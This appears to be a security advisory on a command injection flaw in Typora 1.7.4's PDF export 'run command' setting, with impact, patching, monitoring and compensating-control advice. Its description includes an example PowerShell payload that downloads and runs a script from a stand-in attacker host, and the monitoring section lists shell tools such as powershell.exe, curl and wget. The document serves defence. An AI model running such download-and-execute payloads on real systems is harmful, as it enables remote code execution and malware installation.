A critical command injection vulnerability, identified as CVE-2024-14010, exists in Typora version 1.7.4. This flaw allows an attacker to execute arbitrary commands on a user's system by manipulating the PDF export preferences, potentially leading to a full system compromise, data theft, or malware installation. Due to its critical severity (CVSS 9.8), immediate remediation is required to prevent exploitation.

This is a command injection vulnerability located in the PDF export feature of Typora. The application fails to properly sanitize user-supplied input in the 'run command' field within the PDF export preferences. An attacker can exploit this by injecting malicious system commands (e.g., & powershell -c "iex(new-object net.webclient).downloadstring('http://attacker.com/payload.ps1')") into this field. When a user exports a document to PDF with these modified preferences, the application executes the injected command with the same privileges as the user running Typora, leading to arbitrary code execution.

This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation could lead to a complete compromise of the affected user's workstation. Potential consequences include the theft of sensitive corporate or personal data, installation of persistent malware such as ransomware or spyware, and the use of the compromised system as a launchpad for further attacks within the organization's network. The direct business risks include data breaches, financial loss, reputational damage, and operational disruption.

Immediate Action:

• Immediately update all installations of Typora to the latest patched version as recommended by the vendor.
• Consult the official Typora security advisory for specific patch information and further details on the vulnerability.
• Review system and application logs for any signs of past exploitation attempts, focusing on commands executed during PDF exports.

Proactive Monitoring:

• Monitor for suspicious child processes being spawned by the Typora process (e.g., cmd.exe, powershell.exe, bash, curl, wget).
• Implement endpoint detection and response (EDR) rules to alert on unusual command-line arguments associated with the Typora application process.
• Monitor network traffic for unexpected outbound connections from workstations running Typora, which could indicate communication with a command-and-control server.

Compensating Controls:

• If immediate patching is not feasible, use application control software (e.g., AppLocker) to prevent Typora from launching command-line interpreters or other potentially malicious executables.
• If possible, use a configuration management tool to disable the "run command" after PDF export feature for all users.
• Educate users about the risk and instruct them not to modify PDF export settings or open untrusted documents that may alter these settings.

Public Exploit Available: false

Given the critical CVSS score of 9.8 and the potential for complete system compromise, this vulnerability poses a severe risk to the organization. We strongly recommend that all vulnerable instances of Typora are identified and patched immediately. This vulnerability should be treated as a top priority for remediation. Although it is not currently listed on the CISA KEV list, its high impact and ease of exploitation make it an attractive target for threat actors.